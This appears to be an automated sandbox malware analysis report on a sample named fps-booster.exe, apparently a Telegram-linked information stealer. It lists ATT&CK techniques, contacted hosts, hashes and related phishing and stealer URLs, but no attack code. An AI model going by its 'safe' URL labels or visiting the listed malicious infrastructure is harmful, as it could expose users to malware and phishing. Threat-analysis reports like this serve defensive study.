Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items
Privilege Escalation: 11 Process Injection; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items
Defense Evasion: 1 Disable or Modify Tools; 151 Virtualization/Sandbox Evasion; 11 Process Injection; 2 Obfuscated Files or Information; 12 Software Packing; 1 DLL Side-Loading; Compile After Delivery
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync
Discovery: 1 Query Registry; 231 Security Software Discovery; 1 Process Discovery; 151 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 1 File and Directory Discovery; 22 System Information Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management
Collection: 1 Archive Collected Data; 1 Data from Local System; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture
Command and Control: 11 Encrypted Channel; 1 Ingress Tool Transfer; 2 Non-Application Layer Protocol; 3 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery
Behavior Graph legend (graph image not included): Process; Signature; Created File; DNS/IP Info; Is Dropped; Is Windows Process; Number of created Registry Values; Number of created Files; Visual Basic; Delphi; Java; .Net C# or VB.NET; C, C++ or other language; Is malicious; Internet

Source | Detection | Scanner | Label
fps-booster.exe | 100% | Joe Sandbox ML |
        No Antivirus matches
        No Antivirus matches
        No Antivirus matches
Source | Detection | Scanner | Label
http://nuget.org/NuGet.exe | 0% | URL Reputation | safe
http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe
https://aka.ms/pscore6lB | 0% | URL Reputation | safe
http://www.apache.org/licenses/LICENSE-2.0.html | 0% | URL Reputation | safe
https://contoso.com/ | 0% | URL Reputation | safe
https://nuget.org/nuget.exe | 0% | URL Reputation | safe
https://www.newtonsoft.com/jsonschema | 0% | URL Reputation | safe
https://contoso.com/License | 0% | URL Reputation | safe
https://contoso.com/Icon | 0% | URL Reputation | safe
http://upx.sf.net | 0% | URL Reputation | safe
https://www.nuget.org/packages/Newtonsoft.Json.Bson | 0% | URL Reputation | safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
http://james.newtonking.com/projects/json | 0% | URL Reputation | safe
https://t.me/ | 0% | Avira URL Cloud | safe
https://github.com/LimerBoy/StormKitty | 0% | Avira URL Cloud | safe
https://cdn4.cdn-telegram.org/file/fapIFbqBbgzeTGVf2MgK9R3TREdZxe6M1H7h8z6AC--HryTNnfiDs4V2Uktm05Uoq | 0% | Avira URL Cloud | safe
https://github.com/JamesNK/Newtonsoft.Json | 0% | Avira URL Cloud | safe
https://github.com/Pester/Pester | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
t.me | 149.154.167.99 | true | false | | unknown
smallduck.ru | 217.78.239.114 | true | false | | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://t.me/ | fps-booster.exe, 00000000.00000002.2484713243.0000000002DCD000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://nuget.org/NuGet.exe | powershell.exe, 00000002.00000002.2206507866.0000000005B8D000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://cdn4.cdn-telegram.org/file/fapIFbqBbgzeTGVf2MgK9R3TREdZxe6M1H7h8z6AC--HryTNnfiDs4V2Uktm05Uoq | fps-booster.exe, 00000000.00000002.2484713243.0000000002DC9000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000002.00000002.2204160889.0000000004C75000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://github.com/LimerBoy/StormKitty | fps-booster.exe, 00000000.00000002.2489316587.0000000007790000.00000004.08000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://aka.ms/pscore6lB | powershell.exe, 00000002.00000002.2204160889.0000000004B21000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000002.00000002.2204160889.0000000004C75000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/ | powershell.exe, 00000002.00000002.2206507866.0000000005B8D000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://nuget.org/nuget.exe | powershell.exe, 00000002.00000002.2206507866.0000000005B8D000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.newtonsoft.com/jsonschema | fps-booster.exe, 00000000.00000002.2493013521.000000000B240000.00000004.08000000.00040000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/License | powershell.exe, 00000002.00000002.2206507866.0000000005B8D000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/Icon | powershell.exe, 00000002.00000002.2206507866.0000000005B8D000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://upx.sf.net | Amcache.hve.6.dr | false | URL Reputation: safe | unknown
https://www.nuget.org/packages/Newtonsoft.Json.Bson | fps-booster.exe, 00000000.00000002.2493013521.000000000B240000.00000004.08000000.00040000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | fps-booster.exe, 00000000.00000002.2484713243.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2204160889.0000000004B21000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://github.com/Pester/Pester | powershell.exe, 00000002.00000002.2204160889.0000000004C75000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://james.newtonking.com/projects/json | fps-booster.exe, 00000000.00000002.2493013521.000000000B240000.00000004.08000000.00040000.00000000.sdmp | false | URL Reputation: safe | unknown
https://github.com/JamesNK/Newtonsoft.Json | fps-booster.exe, 00000000.00000002.2493013521.000000000B240000.00000004.08000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
217.78.239.114 | smallduck.ru | Russian Federation | 197349 | SKYLINEWIMAXRU | false
149.154.167.99 | t.me | United Kingdom | 62041 | TELEGRAMRU | false
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1482549
Start date and time: 2024-07-26 01:13:38 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 6m 33s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name: Run with higher sleep bypass
Number of new started processes analysed: 10
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: fps-booster.exe
Detection: MAL
Classification: mal80.troj.spyw.evad.winEXE@5/8@2/2
EGA Information:
• Successful, ratio: 50%
HCA Information:
• Successful, ratio: 77%
• Number of executed functions: 70
• Number of non-executed functions: 5
Cookbook Comments:
• Found application associated with file extension: .exe
• Sleeps bigger than 100000000ms are automatically reduced to 1000ms
• Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 52.168.117.173
• Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, client.wns.windows.com, ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target powershell.exe, PID 6960 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
• Report size getting too big, too many NtSetInformationFile calls found.
• VT rate limit hit for: fps-booster.exe
Time | Type | Description
19:15:01 | API Interceptor | 7x Sleep call for process: fps-booster.exe modified
Context for the contacted IP (other samples that contacted the same IP):

Match | Associated Sample Name / URL | Detection | Threat Name | Context
149.154.167.99 | http://bekaaviator.kz/ | malicious | Unknown | telegram.org/
149.154.167.99 | http://telegramtw1.org/ | malicious | Unknown | telegram.org/?setln=pl
149.154.167.99 | http://makkko.kz/ | malicious | Unknown | telegram.org/
149.154.167.99 | http://telegram.dog | malicious | Unknown | telegram.dog/
149.154.167.99 | LnSNtO8JIa.exe | malicious | Cinoshi Stealer | t.me/cinoshibot
149.154.167.99 | jtfCFDmLdX.exe | malicious | Gurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, zgRAT | t.me/cinoshibot
149.154.167.99 | vSlVoTPrmP.exe | malicious | Gurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, zgRAT | t.me/cinoshibot
149.154.167.99 | RO67OsrIWi.exe | malicious | Gurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, zgRAT | t.me/cinoshibot
149.154.167.99 | KeyboardRGB.exe | malicious | Unknown | t.me/cinoshibot
149.154.167.99 | file.exe | malicious | Cinoshi Stealer | t.me/cinoshibot

Context for the contacted domain (other samples that contacted the same domain):

Match | Associated Sample Name / URL | Detection | Threat Name | Context
t.me | LisectAVT_2403002A_138.exe | malicious | Vidar | 149.154.167.99
t.me | LisectAVT_2403002A_425.dll | malicious | Unknown | 149.154.167.99
t.me | LisectAVT_2403002A_425.dll | malicious | Unknown | 149.154.167.99
t.me | LisectAVT_2403002B_272.exe | malicious | PureLog Stealer, Vidar | 149.154.167.99
t.me | LisectAVT_2403002B_344.exe | malicious | Bdaejec, Vidar | 149.154.167.99
t.me | Bootstrapper.exe | malicious | Hancitor, Vidar | 149.154.167.99
t.me | LisectAVT_2403002C_18.exe | malicious | Raccoon | 188.114.96.3
t.me | LisectAVT_2403002C_18.exe | malicious | Raccoon | 188.114.97.3
t.me | LisectAVT_2403002C_60.exe | malicious | PureLog Stealer, Vidar | 149.154.167.99
t.me | LisectAVT_2403002C_67.exe | malicious | PureLog Stealer, Vidar | 149.154.167.99

Context for the contacted ASNs (other samples that contacted the same ASN):

Match | Associated Sample Name / URL | Detection | Threat Name | Context
TELEGRAMRU | file.exe | malicious | Unknown | 149.154.167.220
TELEGRAMRU | file.exe | malicious | Unknown | 149.154.167.220
TELEGRAMRU | file.exe | malicious | Unknown | 149.154.167.220
TELEGRAMRU | http://jolly-figolla-4c9551.netlify.app/ | malicious | Unknown | 149.154.167.99
TELEGRAMRU | LisectAVT_2403002A_127.exe | malicious | AgentTesla | 149.154.167.220
TELEGRAMRU | LisectAVT_2403002A_138.exe | malicious | Vidar | 149.154.167.99
TELEGRAMRU | LisectAVT_2403002A_425.dll | malicious | Unknown | 149.154.167.99
TELEGRAMRU | LisectAVT_2403002A_425.dll | malicious | Unknown | 149.154.167.99
TELEGRAMRU | LisectAVT_2403002A_74.exe | malicious | AgentTesla | 149.154.167.220
TELEGRAMRU | New Order.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 149.154.167.220
SKYLINEWIMAXRU | gO6RAJaFXe.elf | malicious | Mirai | 91.105.196.153
SKYLINEWIMAXRU | https://sbatlahfirahfoudggetgd.blob.core.windows.net/sbatlahfirahfoudggetgd/1.html?4x7m3FDkTJEczP1p2GRZZoiIdhHjYH24UjAz6N4wmzBMUGDTAWle1uoy4RUBNdG4utah6kZSk2nPrPIYhawSIHt5qk2ermrWyswH#cl/26427_md/7/21449/5023/19036/1614238 | malicious | HTMLPhisher | 217.78.233.95
SKYLINEWIMAXRU | https://fassouyatajadalravuij.blob.core.windows.net/fassouyatajadalravuij/1.html?KIUS8wH0YY7cB2NMwxGsVoa5iezV7W9cvLqamEPM8HdxqBLgYyX6Goh6aNwgjitRkRWLcAfZPzQwfAIRlIAPQ3jfogxjD1t9nA60#cl/26081_md/7/18507/5419/19036/1614238 | malicious | Phisher | 217.78.233.95
SKYLINEWIMAXRU | WGHFgjyKDE.elf | malicious | Unknown | 91.105.196.132
SKYLINEWIMAXRU | https://shoutout.wix.com/so/d9OnulLek/c?w=aBwtj3vLyIt1v_BcFl1lIQUYUnO7j56NqO9d_ZxCWaE.eyJ1IjoiaHR0cHM6Ly84OG5iLmNjL3p2OGNvIiwiciI6ImQ5MjMyOTE1LTc5ZTMtNGQ2ZC05NmQ0LTQ3NTY4NWFlZmRjOCIsIm0iOiJtYWlsIiwiYyI6IjAwMDAwMDAwLTAwMDAtMDAwMC0wMDAwLTAwMDAwMDAwMDAwMCJ9 | malicious | Phisher | 217.78.233.217
SKYLINEWIMAXRU | https://asixvsakcsvcvoyiuy.blob.core.windows.net/asixvsakcsvcvoyiuy/url.html | malicious | HTMLPhisher | 217.78.233.133
SKYLINEWIMAXRU | https://hhhfudijdu345jdfjj.blob.core.windows.net/hhhfudijdu345jdfjj/unsb.html | malicious | Unknown | 217.78.233.133
SKYLINEWIMAXRU | https://hdjsgytzdijlko.blob.core.windows.net/hdjsgytzdijlko/url.html | malicious | Phisher | 217.78.233.133
SKYLINEWIMAXRU | https://hhuuujjjfzjdsduj.blob.core.windows.net/hhuuujjjfzjdsduj/url.html | malicious | Phisher | 217.78.233.133
SKYLINEWIMAXRU | https://come.to/wasda5 | malicious | GRQ Scam, Phisher | 217.78.233.133

Context for the JA3 fingerprint (other samples with the same JA3 fingerprint):

Match | Associated Sample Name / URL | Detection | Threat Name | Context
3b5074b1b5d032e5620f69f9f700ff0e | https://metamaskwalletexetention.webflow.io/ | malicious | Unknown | 217.78.239.114, 149.154.167.99
3b5074b1b5d032e5620f69f9f700ff0e | http://56edthdxfhbx.pages.dev/ | malicious | TechSupportScam | 217.78.239.114, 149.154.167.99
3b5074b1b5d032e5620f69f9f700ff0e | https://banco.estado-app.com | malicious | Unknown | 217.78.239.114, 149.154.167.99
3b5074b1b5d032e5620f69f9f700ff0e | http://contact-office-kawai9lpoe9srsi9lpoe9srsi.narymar.com/ | malicious | Unknown | 217.78.239.114, 149.154.167.99
3b5074b1b5d032e5620f69f9f700ff0e | http://gentle-union.wordsowd.workers.dev/ | malicious | Unknown | 217.78.239.114, 149.154.167.99
3b5074b1b5d032e5620f69f9f700ff0e | https://verify-metamask.simple-url.com/nkbihfbeogaeaoehlefnkodbefknnfbfzeygds | malicious | Unknown | 217.78.239.114, 149.154.167.99
3b5074b1b5d032e5620f69f9f700ff0e | http://walletdappsync.com/ | malicious | Unknown | 217.78.239.114, 149.154.167.99
3b5074b1b5d032e5620f69f9f700ff0e | LisectAVT_2403002A_124.exe | malicious | AgentTesla | 217.78.239.114, 149.154.167.99
3b5074b1b5d032e5620f69f9f700ff0e | LisectAVT_2403002A_127.exe | malicious | AgentTesla | 217.78.239.114, 149.154.167.99
3b5074b1b5d032e5620f69f9f700ff0e | LisectAVT_2403002A_133.exe | malicious | AgentTesla | 217.78.239.114, 149.154.167.99
            No context
Process: C:\Windows\SysWOW64\WerFault.exe
File Type: Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category: dropped
Size (bytes): 65536
Entropy (8bit): 1.36323561567183
Encrypted: false
SSDEEP: 192:8uVGHJsv2990BU/iaGtvzpVUW5zuiFpZ24IO8z:VGpslBU/iaQrUW5zuiFpY4IO8z
MD5: 2BE0997710331AD904FC0A99C9D489E6
SHA1: A8FF963BC9E779E59482B62E5DA921CFF41B3418
SHA-256: B1C60AA48CE36EC6DC33B481BB6997878E63D20E4EAB97A790E58817925F9A85
SHA-512: EB220F0E31F329088C939E8F10BD7A696221EEC0D262E4B5F95EBAEA00EAE02A587DDAB5E2E1E5505B620F9A3BEEEACF3924631CF575DDFE78DD7F0689AACA3D
Malicious: true
Reputation: low
            Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.6.4.2.2.8.7.2.1.3.7.7.2.9.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.6.4.2.2.8.7.3.1.5.3.3.6.3.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.a.8.8.d.2.3.4.-.d.d.b.8.-.4.0.3.f.-.8.a.3.a.-.d.e.2.f.1.4.0.2.6.8.6.8.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.2.4.7.0.9.4.3.-.1.4.a.a.-.4.d.3.d.-.8.f.d.3.-.3.7.d.2.3.e.7.c.7.4.4.1.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.f.p.s.-.b.o.o.s.t.e.r...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.g.i.l.r.f.d.i.r.5.l.7.g.s.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.5.d.0.-.0.0.0.1.-.0.0.1.5.-.a.0.1.1.-.c.1.6.4.e.8.d.e.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.5.e.e.a.1.2.8.5.e.d.1.d.f.d.4.0.e.c.7.9.9.8.1.5.9.0.1.a.5.c.6.0.0.0.0.0.0.0.0.!.0.0.0.0.6.7.c.b.9.d.a.8.0.7.8.1.a.c.6.2.7.2.5.b.3.4.f.7.b.a.7.3.b.
Process: C:\Windows\SysWOW64\WerFault.exe
File Type: Mini DuMP crash report, 15 streams, Thu Jul 25 23:14:32 2024, 0x1205a4 type
Category: dropped
Size (bytes): 440275
Entropy (8bit): 3.365379742744488
Encrypted: false
SSDEEP: 3072:/YWEDKbXSu0NstApkELLB7ZO4uEqGLTgIaFpvyJB4Vo:/YPD+VhtACELO47Tgfvy
MD5: A86D68C067A9EC12C1EE5BEC5E9DB272
SHA1: DC9FF2F5610DCDDED1E2E56F872D4A5B4BEF64A3
SHA-256: F2DD176C8527452E1DBCCA83B470F347FE985CB920A08EF69D8C42935003BCC4
SHA-512: E6E0ACBF3AF7E157C14A8C8B80C2CBE559E16DBAED471FE4B9CA40C3124022F4BBD69C9FB3FBA3F75781A08883B977F5CFF1E328B1D0C48FB36F0BD62197D7B7
Malicious: false
Reputation: low
            Preview:MDMP..a..... .......X.f............T............)..h.......$...05.......5..p...........`.......8...........T...........xj..[M..........T5..........@7..............................................................................eJ.......7......GenuineIntel............T...........R.f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
Process: C:\Windows\SysWOW64\WerFault.exe
File Type: XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category: dropped
Size (bytes): 8424
Entropy (8bit): 3.6922358710061935
Encrypted: false
SSDEEP: 192:R6l7wVeJuP6wL6Y2DVSU9BbSrgmfZUc6prr89brHsfL5m:R6lXJ26wL6Y4SU99SrgmfWcDrMfY
MD5: BA9F68E8EBCCF776555428A383C5BAEE
SHA1: D3D2815C4217118D789C26A1B5D309352A894C44
SHA-256: BB6E2823BFE94DCD5B1593CF974BF35FE3ADFB7DB76C87637629E23137667102
SHA-512: CA9E3795E1DBD4AC3C4CA9A27BC6F3A3CF72D2E99F872AA24BC670F8F5FD9CABA3919F9E7D0CD46921167D6F2A83D5B15C90D6C83D0959417A07DF8641C6999D
Malicious: false
Reputation: low
            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.4.8.8.<./.P.i.
Process: C:\Windows\SysWOW64\WerFault.exe
File Type: XML 1.0 document, ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 4778
Entropy (8bit): 4.460440503616698
Encrypted: false
SSDEEP: 48:cvIwWl8zsPJg77aI9VyWpW8VY/Ym8M4JmpKFr+q8vSplG4q+vd:uIjfxI7TT7V3JuoKql1hvd
MD5: DA64D4F0452356C5A0DC3BE7467BBF0D
SHA1: 4D97B2463A13FA6F2374CE28F73A06C2F716533B
SHA-256: CA60F4D9B490B5E4EFF16BB77CF8CBF0961F6F1ABA02665D8C5630ED89321B09
SHA-512: D9B0735D648667A76C014CA6B6C2CC0D5A9D2DBECB00C0F62B0D128F0E99A329DBC833BD8FB91D9EB23A5622ED0B53D9514FEFA7C91E6D5B2F8854C4FC92753C
Malicious: false
Reputation: low
            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="427097" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 1240
Entropy (8bit): 5.364593882999565
Encrypted: false
SSDEEP: 24:3oWSKco4KmZjKbm51s4RPzIld6moUP7mZ9tXt/NK3R8W9yD:4WSU4xymI4RU9oUP7mZ9tlNWR8uO
MD5: BE1AF8BD06D8855FD35D3A9C0F608140
SHA1: A134C2A37D5A6F49B10A1E016CED16502971CBEF
SHA-256: 36178A70CA415E5089C102EC9B506DE5A586C6E0B4C416AF1F3696890903BCDE
SHA-512: 5EE5586810C6D6101EB80147BBB3B8A707AB8DF3E7FDE7A571EFD63922637A66772824EC40326654660CD2B4C7268BFFF80ED1993F5F6112602DB78FDA0C8411
Malicious: false
Reputation: low
            Preview:@...e...........................................................P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.D....................+.H..!...e........System.Configuration.Ins
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Reputation: high, very likely benign file
Preview: # PowerShell test file to determine AppLocker lockdown mode
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Reputation: high, very likely benign file
Preview: # PowerShell test file to determine AppLocker lockdown mode
Process: C:\Windows\SysWOW64\WerFault.exe
File Type: MS Windows registry file, NT/2000 or above
Category: dropped
Size (bytes): 1835008
Entropy (8bit): 4.4688822708812035
Encrypted: false
SSDEEP: 6144:kzZfpi6ceLPx9skLmb0fvZWSP3aJG8nAgeiJRMMhA2zX4WABluuNgjDH5S:KZHtvZWOKnMM6bFpWj4
MD5: 1DCA0A0F990D02D821FBBF6FCFFF1DC8
SHA1: 6830B891DD41125264F2766C1E19C274E3C907FC
SHA-256: 072313E46E01C5A8B4D14A65079D746043CB5BEE5F5F6FA1090E904D27FF506C
SHA-512: 9380A08078E233A696A18609E8361677E96B61665C074F6F344CC9FD382EA17E81D7CC86BF02A1D7289FCAD256DFC7EA58012A09F17CAF5D994FB05191D6FF32
Malicious: false
            Preview:regfH...H....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm...h................................................................................................................................................................................................................................................................................................................................................LG.\........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
            Entropy (8bit):7.995939480820394
            TrID:
            • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
            • Win32 Executable (generic) a (10002005/4) 49.78%
            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
            • Generic Win/DOS Executable (2004/3) 0.01%
            • DOS Executable Generic (2002/1) 0.01%
            File name:fps-booster.exe
            File size:1'021'952 bytes
            MD5:913b3caeab0b292da088ea75c53ac17e
            SHA1:67cb9da80781ac62725b34f7ba73b8267ba767cd
            SHA256:9cfc821a019cfefcd580ae7bd6152438b3447e2a7a45e68c6d0cb4227fc8da21
            SHA512:e5e750b607412a8eeff8fe47a6e080d9f07b47aba3024c888fff648331359830d5dd3c30064c671cbb49ea01cc84b094952a9c354b9d9d5933d6493a51914ae1
            SSDEEP:24576:F0OlMXLCkq66rPiFRwMS0MLEVopb4UcIXj7/jOVevqV3amUl8AD:COKbtf6Ti0MS7oVoB4U/jOYuKmUO
            TLSH:A625335D3ADFD23ED41992B4DEE4CB92A320D1FA3A1350D604C660E70E1B55B7816E73
            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...>.kc..........".................~.... ........@.. ....................................`................................
            Icon Hash:00928e8e8686b000
            Entrypoint:0x4faa7e
            Entrypoint Section:.text
            Digitally signed:false
            Imagebase:0x400000
            Subsystem:windows gui
